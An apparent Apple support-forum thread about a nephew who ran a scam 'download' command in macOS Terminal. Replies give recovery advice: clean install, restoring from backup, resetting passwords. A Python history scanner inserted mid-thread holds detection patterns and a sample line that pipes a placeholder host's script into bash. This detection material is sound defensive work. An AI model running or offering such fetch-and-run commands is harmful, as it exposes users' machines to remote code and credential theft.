Terminal scam! Advice needed please.

Terminal scam:


Hi, my nephew got tricked into using terminal to "download" an app on his Retina, 15-inch, Late 2013 macbook pro running macOS Big Sur. Going into Terminal history, the following may be the code entered and the echo:


***


Please advise.


Johan


[Edited by Moderator]

iPhone 12 mini, iOS 18

Posted on Feb 19, 2026 8:56 AM

Question marked as Top-ranking reply

Posted on Feb 19, 2026 10:39 AM

I see that the Moderator has already redacted the command in question.


However, there was another thread where the command that someone entered was a deliberately obscured version of "download an arbitrary script from a remote Web site, and then run that script". We don't know for certain what was in the script that the OP of that thread ran, but someone who grabbed a copy of a script from the same place – before the Moderators obscured the location – reported that it appeared to be full of all sorts of nasties.


Your nephew may need to assume that his machine has been so thoroughly compromised that "the only way to be sure is to take off and nuke the site from orbit", i.e. something along the lines of


  • Erase the Mac and reinstall macOS from scratch
  • Restore whatever data he can from a backup that was made before he ran the suspicious command
  • Change all of his passwords


If he does not take such drastic action, it might be almost impossible to show that the machine was free of nasties, like, say, spyware designed to steal passwords, financial information, and information that would be useful to some criminal who wanted to commit identity fraud.


Feb 20, 2026 8:55 AM in response to JBennet

JBennet wrote:

Thank you leroydouglas, much appreciated!
If you say "post it again" are you referring to a new post or like this reply?

The command looks very similar starting with:

[Edited by Moderator]


Yes, here as you posted— got the email for a look-see; the Moderators edited/removed as expected.


It sure has the look of the dubious base64 code and cURL pulled off the internet, even seeing the abbreviated/limited code you posted as expected.


Not good.

All the red flags and alarm bells should be going off.



—You have the way forward: a complete erase/ reformat/re-install of the macOS,

—then restoring the user Data from backup— prior to the time the Terminal code was initiated.


All this would be found in the similar post referenced above... for more details tossed about.


How to reinstall macOS

 Recovery (both M1/M2/M3/M4 and Intel) — https://support.apple.com/en-us/HT204904


Restore your Mac from a backup  https://support.apple.com/en-us/102551




Feb 22, 2026 11:45 AM in response to JBennet

JBennet wrote:

Hi, thank you for your assistance. It seems the "moderator" will keep on deleting any info I try to add here. I honestly do not see the point of trying to post relevant "detailed" information if the "moderator" deletes it? Oye?

My nephew didn't use Time Machine and since we have no way of finding out what the terminal code may have compromised (no thanks to the "moderator") it seems he will have to do a clean install and lose a lot of the music he composed along with some of the apps and plugins he built up...

Thank you again leroydouglas, much appreciated.


Understood.

We do not want details of a malicious exploit posted in the public communities for eternity.


We all get email copies of your post once we participate— at least it is an option to receive email updates to the thread.


We get details you posted even if the details get removed in the community forum...

I tried to corroborate that point above.



At this time in the conversation it seems a moot point. You have the way forward: an erase/clean install is the way forward; lesson learned about backups... yes, sorry.


The rule of thumb—

If you value your user data:

3-2-1 Backup Strategy: three copies of your data, two different methods, and one offsite.

More than one device, more than one backup methodology— and backup regularly.




Recognize and avoid social engineering schemes including phishing messages, phony support calls, and other scams - Apple Support

Protecting against malware in macOS - Apple Support

Effective defenses against malware and other threats… - Apple Community

Security and your Apple Account - Apple Support



Some outside references— detailed


https://www.bleepingcomputer.com/news/security/fake-mac-fixes-trick-users-into-installing-new-shamos-infostealer/


https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/


Feb 20, 2026 12:17 PM in response to leroydouglas

For simplicity, the article cited just above, "Restore your Mac from Backup" addresses ONLY the simpler case of using Migration Assistant to restore from the Most Recent Backup.


If you wish to access older data from just before the "bad stuff" was added, you need to ONLY create a new (or same as old) Admin account and do NOT restore from backup using Setup Assistant/Migration Assistant.


After initial setup, launch Time Machine.app, either by double clicking its Icon in the /Applications folder, or choosing "Browse Time Machine backups" off the Time Machine Icon in the MenuBar.


Then surf backward in time to just BEFORE the "bad stuff" was added, and restore the entire Userid as of that date. You will see the complete files for each userid in the /Users directory, separately under each UserShortName.


If only one user was ever created, that is NOT treated as a special case.


--------

You mentioned a nephew. If working with someone else on this project, remember these forums are openly available to be read and searched by all, and readers can add additional postings when logged in with their Apple-ID/Apple-Account.



Feb 22, 2026 12:09 PM in response to JBennet

This is quite possibly the same mess and the recovery steps, as was mentioned else-thread:



However… Triage applies. None of us have the resources (time, focus, access) to fix everything. Here, I would wonder whether someone making a cascade of errors is an addressable problem for anybody else. I would also wonder whether (not) resolving this might help them better focus on how to manage their equipment. Or might cause them to adopt the “que será, será” strategy; ignoring the mess, and continuing with whatever might happen.


With no backups and an inadequate filing system, they were already one mistake or one failure or one dunk or one theft away from mass data loss. And here we are.


As for remediation and recovery here, there isn’t a good path here. Not without those missing backups. They’re going to get to export their passwords, erase it all, restore just macOS, reinstall their apps, and start the “fun” of a global password reset. See the link to the previous thread.


Or they’ll skip some or all of the recovery steps and then seek help with the remnants, having seen this choice picked a little too often.


Triage? To avoid getting overwhelmed providing (paid) IT support, I had to set support request limits, particularly including not cleaning up messes I couldn’t prepare for. This is the classic IT support pitfall: all the responsibilities with none of the authority. Without setting the rules of engagement, last-minute panics — and with few or no means of non-heroic recovery — is not sustainable.



PS: Others in their circle (you, etc) will quite possibly get phishing messages, purportedly from them.


Feb 19, 2026 1:25 PM in response to JBennet

Time Machine saves, and can re-create, ANY Moment in time for which it still holds backup files.


If you have been using Time Machine with regularity...

AND you know when the "bad stuff" was added...

..and you have already ERASED everything and re-installed MacOS...


... you can use Time Machine.App (NOT Migration Assistant or Setup Assistant) to restore the state of your machine from just before the bad stuff was added.







Feb 19, 2026 12:13 PM in response to JBennet




Going into Terminal history, the following may be the code entered and the echo:

*****



JBennet—


If you post it again, we will get a copy of your post in email, before the mods remove it again from the community here...


Otherwise I have no idea what is what here.



It does sound like a vulnerability.


Here was a reference to similar—


CASE IN POINT— here in it was a malicious exploit.


"i was opening a site and it wanted manual verification for cloudflare through terminal"


Understanding and reversing a suspicious terminal command

ref: https://discussions.apple.com/thread/256133893?sortBy=oldest_first




See if this was in the string of the Terminal command that was redacted by the moderators...(?)


One of the concerns here, part of the dubious base64 code, which was not specifically commented on:


nohup bash & — command used to run a Bash script or command in the background, ensuring it continues to execute even if the user logs out or closes the terminal


nohup – invoke a utility immune to hangups
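A defender-side check for the indicators this reply calls out (a cURL download piped into a shell, base64 decoding piped into a shell, and `nohup ... &`), run over shell history. This is an added example, not code from the thread or from any poster; the sample history lines are constructed, the host name is a placeholder, and the assumed zsh timestamp form is the EXTENDED_HISTORY layout `: epoch:0;command`.

```python
"""Flag ClickFix-style 'paste this into Terminal' commands in a shell history.

Heuristics mirror the indicators discussed in the thread: a remote download
(curl/wget) piped into an interpreter, base64 decoding piped into an
interpreter, and nohup ... & used to keep a script alive after the window
closes. Sample lines below are constructed; the host name is a placeholder.
"""
import re
from pathlib import Path

# Each rule: (name, compiled regex). Case-insensitive so cURL/CURL match too.
RULES = [
    ("remote-fetch-piped-to-shell",
     re.compile(r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.I)),
    ("base64-decode-piped-to-shell",
     re.compile(r"base64\s+(-d|--decode|-D)\b.*\|\s*(sudo\s+)?(ba|z|da)?sh\b", re.I)),
    ("nohup-background-shell",
     re.compile(r"\bnohup\b.*\b(ba|z|da)?sh\b.*&\s*$", re.I)),
]

def strip_zsh_timestamp(line):
    # Assumed zsh EXTENDED_HISTORY layout: ': 1700000000:0;command'
    m = re.match(r"^: \d+:\d+;(.*)$", line)
    return m.group(1) if m else line

def flag_history(lines):
    """Return [(line_no, rule_name, command)] for every history line that trips a rule."""
    hits = []
    for no, raw in enumerate(lines, 1):
        cmd = strip_zsh_timestamp(raw.rstrip("\n"))
        for name, rx in RULES:
            if rx.search(cmd):
                hits.append((no, name, cmd))
    return hits

def flag_history_file(path):
    """Scan a real history file such as ~/.zsh_history or ~/.bash_history."""
    return flag_history(Path(path).read_text(errors="replace").splitlines())

# Constructed sample history (not taken from the thread); host name is a placeholder.
SAMPLE_HISTORY = [
    "ls -la ~/Music",
    ": 1700000000:0;curl -fsSL https://example.invalid/fix.sh | bash",
    "echo 'aGVsbG8K' | base64 -d | sh",
    "nohup bash /tmp/updater.sh &",
    "echo aGVsbG8K | base64 -d",   # decoding alone executes nothing; not flagged
    "git status",
]

if __name__ == "__main__":
    for no, rule, cmd in flag_history(SAMPLE_HISTORY):
        print(f"line {no}: {rule}: {cmd}")
```

Any hit is a reason to treat the machine as compromised along the lines the replies above describe; a clean history is not proof of safety, since the history can be cleared.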



Feb 22, 2026 11:27 AM in response to leroydouglas

Hi, thank you for your assistance. It seems the "moderator" will keep on deleting any info I try to add here. I honestly do not see the point of trying to post relevant "detailed" information if the "moderator" deletes it? Oye?


My nephew didn't use Time Machine and since we have no way of finding out what the terminal code may have compromised (no thanks to the "moderator") it seems he will have to do a clean install and lose a lot of the music he composed along with some of the apps and plugins he built up...


Thank you again leroydouglas, much appreciated.


